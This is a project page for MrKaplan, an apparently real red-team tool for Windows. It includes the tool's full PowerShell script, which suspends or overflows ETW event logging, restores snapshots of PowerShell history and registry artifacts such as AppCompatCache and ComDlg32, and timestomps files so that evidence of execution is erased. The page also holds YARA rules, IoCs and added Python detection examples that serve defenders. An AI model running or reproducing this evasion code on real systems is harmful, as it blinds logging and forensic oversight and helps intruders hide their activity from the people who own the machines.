Idov31/MrKaplan

Description

MrKaplan is a tool aimed at helping red teamers stay hidden by clearing evidence of execution. It works by saving information such as the run time and file snapshots, and associating each piece of evidence with the relevant user.
The tool is inspired by MoonWalk, a similar tool for Unix machines.
You can read more about it on the wiki page.

Features

  • Stop event logging
  • Clear file artifacts
  • Clear registry artifacts
  • Can run for multiple users
  • Can run as a user and as an administrator (running as administrator is strongly recommended)
  • Can save files' timestamps
  • Can exclude certain operations and leave artifacts for the blue team

Usage

  • Before starting operations on the machine, run MrKaplan with the begin flag, and whenever you are done, run it again with the end flag.
  • Do not delete the MrKaplan registry key, otherwise MrKaplan will not be able to use that information.

[Figure 1: MrKaplan: hiding and cleaning traces of code execution]

Code

YARA

/*
A rule to detect MrKaplan.
Author: Ido Veltzman (Idov31)
Date: 15-04-2022
*/

rule MrKaplanStandalone {
    meta:
        description = "A rule to detect MrKaplanStandalone."
        author = "Idov31"
        date = "2022-04-15"
    strings:
        // Base64-decode-then-invoke pattern. The brackets, parentheses and pipe are
        // escaped so they match literally instead of acting as regex syntax;
        // case-insensitivity comes from the nocase modifier.
        $imports1 = /\[System\.Text\.Encoding\]::UTF8\.GetString\(\[System\.Convert\]::FromBase64String\(.*\) \| Invoke-Expression/ nocase
        $imports2 = /\[System\.Text\.Encoding\]::UTF8\.GetString\(\[System\.Convert\]::FromBase64String\(.*\) \| iex/ nocase
        $s1 = "MrKaplan.ps1" ascii nocase
        $s2 = "Clear-Evidence" ascii nocase
        $s3 = "EventLogSettings" ascii nocase
        $s4 = "runAsUser" ascii nocase
        $s5 = "PSHistory" ascii nocase
        $s6 = "C:\\Users\\$($user)\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt" ascii nocase
        $s7 = "HKCU:\\Software\\MrKaplan" ascii nocase
        $s8 = "Invoke-StompFiles" ascii nocase
        $s9 = "Clear-Files" ascii nocase
        $s10 = "Clear-Registry" ascii nocase
        $s11 = "Invoke-RestoreEtw" ascii nocase
        $s12 = "Invoke-LogFileToStomp" ascii nocase
        $s13 = "Invoke-SuspendEtw" ascii nocase
    condition:
        any of ($imports*) and 3 of ($s*)
}

rule MrKaplan {
    meta:
        description = "A rule to detect MrKaplan."
        author = "Idov31"
        date = "2022-04-15"
    strings:
        $imports1 = "Import-Module .\\Modules\\Registry.psm1" ascii nocase
        $imports2 = "Import-Module .\\Modules\\Files.psm1" ascii nocase
        $imports3 = "Import-Module .\\Modules\\Eventlogs.psm1" ascii nocase
        $imports4 = "Import-Module .\\Modules\\Utils.psm1" ascii nocase
        $imports5 = "ipmo .\\Modules\\Registry.psm1" ascii nocase
        $imports6 = "ipmo .\\Modules\\Files.psm1" ascii nocase
        $imports7 = "ipmo .\\Modules\\Eventlogs.psm1" ascii nocase
        $imports8 = "ipmo .\\Modules\\Utils.psm1" ascii nocase
        $s1 = "MrKaplan.ps1" ascii nocase
        $s2 = "Clear-Evidence" ascii nocase
        $s3 = "EventLogSettings" ascii nocase
        $s4 = "runAsUser" ascii nocase
        $s5 = "PSHistory" ascii nocase
        $s6 = "C:\\Users\\$($user)\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt" ascii nocase
        $s7 = "HKCU:\\Software\\MrKaplan" ascii nocase
        $s8 = "Invoke-StompFiles" ascii nocase
        $s9 = "Clear-Files" ascii nocase
        $s10 = "Clear-Registry" ascii nocase
        $s11 = "Invoke-RestoreEtw" ascii nocase
        $s12 = "Invoke-LogFileToStomp" ascii nocase
        $s13 = "Invoke-SuspendEtw" ascii nocase
    condition:
        4 of ($imports*) and 3 of ($s*)
}
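To check the logic of the two YARA rules without a YARA install, here is an added example (my code, not part of the MrKaplan project) that re-implements their string sets and conditions in Python and runs them over constructed PowerShell script-block samples. It also shows why the base64-decode-then-invoke regex has to be escaped: with the brackets, parentheses and pipe left as regex metacharacters the pattern has an unbalanced "(" and is rejected by the regex compiler, so a rule built from it never loads. The sample scripts and the base64 blob are constructed for the test and are not real captures.

```python
import re

# Added example (not the MrKaplan project's code): Python re-implementation of the
# matching logic of the MrKaplanStandalone and MrKaplan YARA rules.

# The base64-decode-then-invoke pattern from $imports1/$imports2, with the
# brackets, parentheses and pipe escaped so they match literally.
BASE64_INVOKE_RE = re.compile(
    r"\[System\.Text\.Encoding\]::UTF8\.GetString\("
    r"\[System\.Convert\]::FromBase64String\(.*\) \| (?:Invoke-Expression|iex)",
    re.IGNORECASE,
)

# The same pattern with the metacharacters left unescaped: "[...]" becomes a
# character class, "GetString(" opens a group that is never closed, "|" is alternation.
UNESCAPED_PATTERN = (
    r"[System.Text.Encoding]::UTF8.GetString([System.Convert]"
    r"::FromBase64String(.*) | Invoke-Expression"
)

# $imports1..$imports8 of the MrKaplan rule.
MODULE_IMPORTS = [
    f"{verb} .\\Modules\\{mod}.psm1"
    for verb in ("Import-Module", "ipmo")
    for mod in ("Registry", "Files", "Eventlogs", "Utils")
]

# $s1..$s13, shared by both rules.
ARTIFACT_STRINGS = [
    "MrKaplan.ps1", "Clear-Evidence", "EventLogSettings", "runAsUser", "PSHistory",
    r"C:\Users\$($user)\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt",
    r"HKCU:\Software\MrKaplan", "Invoke-StompFiles", "Clear-Files", "Clear-Registry",
    "Invoke-RestoreEtw", "Invoke-LogFileToStomp", "Invoke-SuspendEtw",
]


def unescaped_pattern_compiles() -> bool:
    """Returns False: the unbalanced "(" makes the unescaped pattern a syntax error."""
    try:
        re.compile(UNESCAPED_PATTERN)
        return True
    except re.error:
        return False


def _matches(candidates, content):
    lowered = content.lower()  # mirrors the nocase modifier
    return [s for s in candidates if s.lower() in lowered]


def evaluate(content: str) -> dict:
    """Return which rule conditions hold for one script sample."""
    imports = _matches(MODULE_IMPORTS, content)
    artifacts = _matches(ARTIFACT_STRINGS, content)
    return {
        # any of ($imports*) and 3 of ($s*)
        "MrKaplanStandalone": bool(BASE64_INVOKE_RE.search(content)) and len(artifacts) >= 3,
        # 4 of ($imports*) and 3 of ($s*)
        "MrKaplan": len(imports) >= 4 and len(artifacts) >= 3,
        "imports": imports,
        "artifacts": artifacts,
    }


# Constructed samples (not real captures); the base64 blob is a placeholder.
STANDALONE_SAMPLE = "\n".join([
    r"$b = 'QUJDREVG'",
    r"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)) | iex",
    r"New-Item -Path HKCU:\Software\MrKaplan",
    r"Clear-Evidence -runAsUser",
])
MODULE_SAMPLE = "\n".join([
    r"Import-Module .\Modules\Registry.psm1",
    r"Import-Module .\Modules\Files.psm1",
    r"ipmo .\Modules\Eventlogs.psm1",
    r"ipmo .\Modules\Utils.psm1",
    r'$rootKeyPath = "HKCU:\Software\MrKaplan"',
    r"$etwMetadata = Invoke-SuspendEtw",
    r"Invoke-StompFiles $filesToStomp",
])
BENIGN_SAMPLE = "\n".join([
    r"Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt |",
    r"    Select-Object -Last 20",
])

if __name__ == "__main__":
    print("unescaped pattern compiles:", unescaped_pattern_compiles())
    for name, sample in [("standalone", STANDALONE_SAMPLE), ("module", MODULE_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, evaluate(sample))
```

The benign sample reads the current user's own PSReadLine history and trips none of the strings, which is the point of the "3 of ($s*)" threshold: a single path or cmdlet name is not enough on its own.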

PowerShell

param (
    [Parameter(Mandatory=$true)]
    [String]
    $operation,
    [String]
    $etwBypassMethod,
    [String]
    $stompedFilePath,
    [String[]]
    $users,
    [String[]]
    $exclusions,
    [Switch]
    $runAsUser = $false
)

Import-Module .\Modules\Registry.psm1
Import-Module .\Modules\Files.psm1
Import-Module .\Modules\Eventlogs.psm1
Import-Module .\Modules\Utils.psm1

# All saved state lives under this key until the "end" operation removes it.
$rootKeyPath = "HKCU:\Software\MrKaplan"
$PSDefaultParameterValues['*:Encoding'] = 'utf8'
$usage = "`n[*] Possible Usage:`n`n[*] Show help message:`n`t.\MrKaplan.ps1 help`n`n[*] For config creation and start:`n`t.\MrKaplan.ps1 begin`n`t.\MrKaplan.ps1 begin -Users Reddington,Liz`n`t.\MrKaplan.ps1 begin -Users Reddington`n`t.\MrKaplan.ps1 begin -EtwBypassMethod overflow`n`t.\MrKaplan.ps1 begin -RunAsUser`n`t.\MrKaplan.ps1 begin -Exclusions BamKey, OfficeHistory`n`n[*] For cleanup:`n`t.\MrKaplan.ps1 end`n`n[*] To save file's timestamps:`n`t.\MrKaplan.ps1 timestomp -StompedFilePath C:\path\to\file`n`n"

if (Test-Path "banner.txt") {
    $banner = Get-Content -Path "banner.txt" -Raw
    Write-Host $banner
}

function New-Config {
    param (
        [String[]]
        $users,
        [String]
        $etwBypassMethod,
        [String[]]
        $exclusions
    )

    New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS

    if (Test-Path $rootKeyPath) {
        Write-Host "[-] Config already exists, please delete the current and rerun." -ForegroundColor Red
        return $false
    }

    New-Item -Path $rootKeyPath
    New-Item -Path $rootKeyPath -Name "Users"

    if (-not $exclusions) {
        $exclusions = @()
    }

    # Stopping the event logging.
    if (-not $runAsUser) {
        New-ItemProperty -Path $rootKeyPath -Name "RunAsUser" -PropertyType "DWord" -Value $false

        if (-not $exclusions.Contains("eventlogs")) {
            Write-Host "[*] Stopping event logging..." -ForegroundColor Blue

            if ($etwBypassMethod -eq "overflow") {
                Write-Host "[*] This method won't allow any regular user to log in until you end MrKaplan." -ForegroundColor Yellow

                if ($(Read-Host "Are you sure? [y/n]") -eq "y") {
                    $etwMetadata = Get-EventLogsSettings

                    if ($etwMetadata.Count -eq 0) {
                        return $false
                    }

                    if (!$(Clear-EventLogging)) {
                        return $false
                    }

                    New-Item -Path $rootKeyPath -Name "EventLogSettings"

                    foreach ($setting in $etwMetadata.GetEnumerator()) {
                        New-ItemProperty -Path "$($rootKeyPath)\EventLogSettings" -Name $setting.Name -Value $setting.Value
                    }
                }
                else {
                    Write-Host "[-] Exiting..." -ForegroundColor Red
                    return $false
                }
            }
            elseif ($etwBypassMethod -eq "suspend" -or $etwBypassMethod -eq "") {
                $etwMetadata = Invoke-SuspendEtw

                if ($etwMetadata.Count -eq 0) {
                    return $false
                }

                New-Item -Path $rootKeyPath -Name "EventLogSettings"

                foreach ($setting in $etwMetadata[1].GetEnumerator()) {
                    New-ItemProperty -Path "$($rootKeyPath)\EventLogSettings" -Name $setting.Name -Value $setting.Value
                }
            }
            else {
                Write-Host "[-] Unknown ETW patching method, exiting..." -ForegroundColor Red
                return $false
            }

            Write-Host "[+] Stopped event logging." -ForegroundColor Green
        }

        if (-not $exclusions.Contains("appcompatcache")) {
            Copy-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache" -Destination "$($rootKeyPath)\AppCompatCache" -Force -Recurse
        }
    }
    else {
        New-ItemProperty -Path $rootKeyPath -Name "RunAsUser" -Value $true
    }

    if ($users) {
        if (!$runAsUser) {
            $users.Add($env:USERNAME)
        }
        else {
            Write-Host "[-] Cannot use both run as user and users!" -ForegroundColor Red
            return $false
        }
    }
    else {
        $users = @($env:USERNAME)
    }

    # Saving current time.
    New-ItemProperty -Path $rootKeyPath -Name "Time" -Value $(Get-Date).DateTime

    # Saving user data.
    $comDlg32Path = "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32"

    foreach ($user in $users) {
        if ($exclusions.Contains("pshistory")) {
            $powershellHistory = ""
        }
        else {
            $powershellHistoryFile = "C:\Users\$($user)\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

            if (Test-Path $powershellHistoryFile) {
                $powershellHistory = [Convert]::ToBase64String([IO.File]::ReadAllBytes($powershellHistoryFile))
            }
            else {
                $powershellHistory = ""
            }
        }

        New-Item -Path "$($rootKeyPath)\Users" -Name $user
        New-ItemProperty -Path "$($rootKeyPath)\Users\$($user)" -Name "PSHistory" -Value $powershellHistory

        if (-not $exclusions.Contains("comdlg32")) {
            $sid = $(New-Object System.Security.Principal.NTAccount($user)).Translate([System.Security.Principal.SecurityIdentifier]).Value

            if (!(Test-Path "HKU:\$($sid)\$($comDlg32Path)")) {
                continue
            }

            Copy-Item "HKU:\$($sid)\$($comDlg32Path)" -Destination "$($rootKeyPath)\Users\$($user)" -Force -Recurse
        }
    }

    New-ItemProperty -Path $rootKeyPath -Name "Exclusions" -Value $exclusions
    return $true
}

function Clear-Evidence {
    $result = $true

    # Parsing the config.
    if (-not (Test-Path $rootKeyPath)) {
        Write-Host "[-] Config doesn't exist" -ForegroundColor Red
        return $false
    }

    # Running the modules on each user.
    Write-Host "[*] Cleaning logs..." -ForegroundColor Blue
    $users = $(Get-ChildItem -Path "$($rootKeyPath)\Users" | Select-Object PSChildName).PSChildName
    $runAsUser = $(Get-ItemProperty -Path $rootKeyPath -Name "RunAsUser").RunAsUser
    $time = $(Get-ItemProperty -Path $rootKeyPath -Name "Time").Time
    $exclusions = $(Get-ItemProperty -Path $rootKeyPath -Name "Exclusions").Exclusions

    # Stomping the files.
    $filesToStomp = @{}

    if (Test-Path "$($rootKeyPath)\StompedFiles") {
        $regFilesToStomp = Get-ItemProperty "$($rootKeyPath)\StompedFiles"
        $regFilesToStomp.PsObject.Properties |
        ForEach-Object {
            $filesToStomp[$_.Name] = $_.Value
        }
    }

    Invoke-StompFiles $filesToStomp

    foreach ($user in $users) {
        $psHistory = $(Get-ItemProperty -Path "$($rootKeyPath)\Users\$($user)" -Name "PSHistory").PSHistory

        if (-not $(Clear-Files $time $psHistory $user $runAsUser $exclusions)) {
            Write-Host "[-] Failed to clean files for $($user)." -ForegroundColor Red
            $result = $false
        }
    }

    if (!$(Clear-Registry $time $users $runAsUser $exclusions $rootKeyPath)) {
        Write-Host "[-] Failed to cleanup the registry." -ForegroundColor Red
        $result = $false
    }

    # Restoring the event logging.
    if (!$runAsUser -and -not $exclusions.Contains("eventlogs")) {
        Write-Host "[*] Restoring event logging..." -ForegroundColor Blue

        if (Test-Path "$($rootKeyPath)\EventLogSettings") {
            $etwMetadata = @{}
            $regEventLog = Get-ItemProperty "$($rootKeyPath)\EventLogSettings"
            $regEventLog.PsObject.Properties |
            ForEach-Object {
                $etwMetadata[$_.Name] = $_.Value
            }

            if (!$(Invoke-RestoreEtw $etwMetadata)) {
                Write-Host "[-] Failed to restore the eventlogging." -ForegroundColor Red
                $result = $false
            }
        }
    }

    if ($result) {
        Write-Host "[+] Restored! Be careful with your actions now." -ForegroundColor Green
        Remove-Item -Path $rootKeyPath -Recurse -Force
    }
    else {
        Write-Host "[!] Finished with partial restoration." -ForegroundColor Yellow
    }

    return $result
}

# Dispatch on the requested operation.
if ($operation -eq "begin") {
    for ($i = 0; $i -lt $exclusions.Count; $i++) {
        $exclusions[$i] = $exclusions[$i].ToLower()
    }

    if (New-Config $users $etwBypassMethod $exclusions) {
        Write-Host "`n[+] Saved required information!`n[+] You can do your operations." -ForegroundColor Green
    }
    else {
        Write-Host "`n[-] Failed to create config file." -ForegroundColor Red
    }
}
elseif ($operation -eq "end") {
    if (Clear-Evidence) {
        Write-Host "`n[+] All evidences cleared!" -ForegroundColor Green
    }
    else {
        Write-Host "`n[-] Failed to clear all evidences." -ForegroundColor Red
    }
}
elseif ($operation -eq "timestomp") {
    if (Invoke-LogFileToStomp $rootKeyPath $stompedFilePath) {
        Write-Host "`n[+] Saved file's timestamps." -ForegroundColor Green
    }
    else {
        Write-Host "`n[-] Failed to save timestamps." -ForegroundColor Red
    }
}
elseif ($operation -eq "help") {
    Write-Host $usage -ForegroundColor Blue
}
else {
    Write-Host "`n[!] Invalid Usage!" -ForegroundColor Red
    Write-Host $usage -ForegroundColor Blue
}

IoCs

  • A PowerShell process accessing the artifacts mentioned on the wiki page.
  • PowerShell importing strange base64 blobs.
  • A PowerShell process performing token manipulation.
  • MrKaplan's registry key: HKCU:\Software\MrKaplan.
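The IoCs above, together with the artifacts the script itself touches (the per-user PSReadLine history file, the AppCompatCache key and the per-user ComDlg32 key), can be turned into telemetry matching. The following is an added example (my code, not the project's) that runs such checks over constructed, Sysmon-style registry and file event records. It assumes a simplified record shape (event_id, user, image, target) and that HKCU paths appear under HKU\<SID> as Sysmon reports them; the SIDs, usernames and paths are made up for the test.

```python
import re
from typing import Dict, List, Tuple

# Added example (not the MrKaplan project's code): IoC matching over constructed
# telemetry records. Assumed record shape: {"id", "event_id", "user", "image", "target"}.

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")

# Per-user PSReadLine history file; the captured group is the profile owner.
PSHISTORY_RE = re.compile(
    r"\\Users\\(?P<user>[^\\]+)\\AppData\\Roaming\\Microsoft\\Windows"
    r"\\PowerShell\\PSReadLine\\ConsoleHost_history\.txt$",
    re.IGNORECASE,
)
# MrKaplan's state key; under Sysmon HKCU shows up as HKU\<SID> (assumption).
MRKAPLAN_KEY_RE = re.compile(r"\\Software\\MrKaplan(\\|$)", re.IGNORECASE)
APPCOMPAT_RE = re.compile(r"\\Session Manager\\AppCompatCache", re.IGNORECASE)
COMDLG32_RE = re.compile(r"\\Explorer\\ComDlg32", re.IGNORECASE)


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in POWERSHELL_IMAGES


def account_name(user: str) -> str:
    """'CORP\\liz' -> 'liz' (case-folded)."""
    return user.rsplit("\\", 1)[-1].lower()


def classify(event: Dict) -> List[str]:
    """Return the indicator names an event matches (empty list if none)."""
    hits = []
    target = event["target"]
    if MRKAPLAN_KEY_RE.search(target):
        hits.append("mrkaplan_registry_key")
    if is_powershell(event["image"]):
        m = PSHISTORY_RE.search(target)
        # A user's own PowerShell writes its own history; touching another
        # user's history file is what the per-user cleanup loop does.
        if m and m.group("user").lower() != account_name(event["user"]):
            hits.append("powershell_cross_user_pshistory")
        if APPCOMPAT_RE.search(target):
            hits.append("powershell_appcompatcache")
        if COMDLG32_RE.search(target):
            hits.append("powershell_comdlg32")
    return hits


def find_iocs(events: List[Dict]) -> List[Tuple[int, str]]:
    return [(e["id"], hit) for e in events for hit in classify(e)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample records (not real logs): 13 = registry value set, 11 = file create.
SAMPLE_EVENTS = [
    {"id": 1, "event_id": 13, "user": r"CORP\reddington", "image": PS,
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\MrKaplan\Time"},
    {"id": 2, "event_id": 11, "user": r"CORP\reddington", "image": PS,
     "target": r"C:\Users\liz\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"},
    {"id": 3, "event_id": 13, "user": r"CORP\liz", "image": r"C:\Windows\explorer.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU"},
    {"id": 4, "event_id": 13, "user": r"CORP\reddington", "image": PS,
     "target": r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache"},
    {"id": 5, "event_id": 11, "user": r"CORP\liz", "image": PS,
     "target": r"C:\Users\liz\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"},
]

if __name__ == "__main__":
    for event_id, indicator in find_iocs(SAMPLE_EVENTS):
        print(f"event {event_id}: {indicator}")
```

Events 3 and 5 are deliberately benign: Explorer maintaining its own ComDlg32 MRU and a user's own console writing its own history file are normal, so the checks key on the process image and on the mismatch between the acting account and the profile being touched rather than on the path alone.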

Credits

  • PowerSploit
  • Phant0m
  • ForensicArtifacts

Disclaimer

I am not responsible for any damage caused to your computer/programs as a result of this project. I am happy to accept contributions: open a pull request and I will review it!